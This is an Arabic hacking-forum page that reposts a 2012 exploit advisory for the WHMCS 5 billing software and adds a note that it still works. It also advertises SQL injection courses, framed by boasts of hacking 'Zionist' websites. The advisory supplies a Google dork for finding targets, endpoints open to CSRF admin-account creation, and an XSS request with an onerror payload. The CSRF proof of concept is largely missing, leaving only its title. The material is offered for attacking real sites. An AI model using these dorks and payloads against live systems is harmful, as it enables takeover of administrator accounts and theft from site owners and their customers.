1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

XSS WHMCS 5 Multiple CSRF (Add Admin) / XSS Vulnerability

الموضوع في 'الـقـسـم الـعـام' بواسطة .:: RSS ::., بتاريخ ‏31 أغسطس 2012.

كاتب الموضوع : .:: RSS ::. المشاهدات : 2,313 الردود : 0 ‏31 أغسطس 2012
حالة الموضوع:
مغلق
  1. غير متصل

    .:: RSS ::. عضوية آلية

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    السلام عليكم ورحمة الله وبركاته


    الثغره قديمه قليلا لكن جربتها الان اشتغلت معي

    حبيت اضعها لكم

    كود:
    ##########################################################################################################################
    # Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
    # Version: Latest version 5.1 and other previous version maybe vulnerable
    # Vendor: WHMCS - The Complete Client Management, Billing Support Solution
    # Date: 2012-05-30
    # Tested on: win/linux
    # Author/Found by: Shadman Tanjim
    # Email: shadman2600@gmail.com
    # Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
    # Special Thanks: x8631p
    # Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS
    ############################################################################################################################

    CSRF Vulnerability:

    Get:
    http://site.com/clientarea.php
    http://site.com/admin/index.php
    http://site.com/admin/login.php

    Post:
    http://site.com/admin/login.php
    http://site.com/cart.php
    http://site.com/admin/configadmins.php
    http://site.com/pwreset.php


    p0c:




    WHMCS CSRF ExpL0iT PoC










    Cross-site Scripting (XSS) Vulnerability:

    request:pOST http://site.com/knowledgebase.php?action=search HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    search='%20onerror%3D'f(PSRyh)


    HTTP Parameter Pollution :

    1.Affected link: http://site.com/cart.php?a=add&domain=transfer&n913620=v992636
    Affected parameter: a=add

    2. Affected link: http://site.com/domainchecker.php?search=bulkregister&n946774=v992350
    Affected parameter: search=bulkregister

    3. Affected link: http://site.com/cart.php?currency=2&gid=1&n972751=v976696
    Affected parameter: currency=2
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...